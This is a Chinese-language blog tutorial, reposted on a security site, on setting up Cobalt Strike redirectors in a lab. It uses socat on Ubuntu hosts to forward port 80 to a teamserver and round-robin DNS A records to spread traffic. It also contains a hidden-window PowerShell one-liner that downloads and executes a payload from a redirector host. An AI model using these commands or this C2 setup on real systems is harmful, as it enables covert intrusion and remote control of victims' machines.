【远控使用】Cobalt Strike使用重定器

admin
admin
admin
102205
文章
87
评论
2022年1月10日03:32:55评论64 views字数 694阅读2分18秒阅读模式

前言

目标

image-20210901154227983

Cobalt Stike重定向

image-20210831105934755

接着下一步,就是让r1-r3这三台linux主机重定向到我们的teamserver中,可以使用socat来做

DNS系统域名 dj.com

teamserver team.dj.com 192.168.1.105

ubuntu1 r1.dj.com 192.168.1.107

ubuntu2 r2.dj.com 192.168.1.108

这回我们就不要r3了,我电脑运行太多虚拟机会卡

接着就可以用这个定义的A记录域名,直接上cs

image-20210831111049390

这里就要用到socat来进行重定向

工具socat(一款端口重定向工具)我们用它来建立80端口上的连接管理,并且继续在80端口运行那个连接团队服务器的连接。

1
 
socat TCP4-LISTEN:80,fork TCP4:team.dj.com:80

直接用apt安装socat

1
 
apt-get install socat

接着r1,r2执行这个命令,如果端口被占用可以关掉服务,我这边是关掉apache2

1
 
/etc/init.d/apache2 stop

image-20210831223456896

打开cs,创建一个监听窗口,让他访问我们的第一个A地址解析的r1

image-20210901154530913

设置我们所有A记录被轮流访问

image-20210901155233076

1
 
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r1.dj.com:80/a'))"

image-20210901053743593

接着就能实现每个A轮流返回powershell

image-20210901204359074

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【远控使用】Cobalt Strike使用重定器http://cn-sec.com/archives/730003.html

发表评论

匿名网友 填写信息